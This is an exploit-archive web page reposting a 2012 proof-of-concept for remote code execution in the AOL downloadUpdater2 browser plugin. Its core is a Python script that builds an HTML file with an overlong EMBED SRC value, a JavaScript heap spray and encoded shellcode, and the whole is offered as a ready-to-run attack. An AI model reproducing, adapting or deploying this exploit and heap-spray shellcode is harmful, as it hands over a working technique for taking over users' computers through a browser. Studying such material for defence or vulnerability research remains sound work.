首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution (Heap S
来源:Snator.of.Pirates.team [at] gmail.com 作者:Senator 发布时间:2012-08-17  
'''
Title : AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution (Heap Spray)
Version : 1.3.0.0
File : npdnupdater2.dll
Tested : Windows XP SP3 with Mozilla Firefox 3.6.19
Author : Senator of Pirates
Contact : Snator.of.Pirates.team [at] gmail.com
FaceBook : SenatorofPirates
Greet to : Morocco & U.S.A

PoC : 1337day.com/exploits/19117

download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)

see also the installer aol_toolbar_pricecheck.exe
url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown00000043
'''

PoC = "<EMBED TYPE=applicatiotn/x-vend.aol.dnupdater2.1"
PoC += "\n"
PoC += "SRC="
PoC += "\x41" *4484
PoC += "\x0c\x0c\x0c\x0c"
PoC += "\n"
PoC += "\x61" *16
PoC += "\n"
PoC += ">"
PoC += "\n"
PoC += "</EMBED>"
PoC += "\n\n"
temp = """<script>
// Calc.exe
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

nops = unescape ('%u\9090%u\9090');
headersize = 20;


slackspace = headersize + shellcode. length ;
while (nops. length < slackspace) nops += nops;
fillblock= nops.substring(0, slackspace);

block= nops.substring(0, nops. length - slackspace);
while (block. length +slackspace < 0x50000) block= block+ block+ fillblock;

memory= new Array ();
for ( counter=0; counter<250; counter++) memory[counter]= block + shellcode;
</script>"""

Total = PoC+temp
File = "Boom.html"
crashy = open(File,"w")
crashy.write(Total)
crashy.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·E-Mail Security Virtual Applia
·Mozilla Firefox 14.01 Memory E
·globalSCAPE CuteZIP Stack Buff
·Windows Service Trusted Path P
·Apple Quicktime plugin - Windo
·DivX Plus Player plugin 2.2.0.
·Adobe Flash Player 11.3 Font P
·Novell ZENworks Asset Manageme
·Divx 6.8.2 - Denial Of Service
·Cyclope Employee Surveillance
·VLC All versions - .m3u/.vlc D
·TestLink 1.9.3 Arbitrary File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved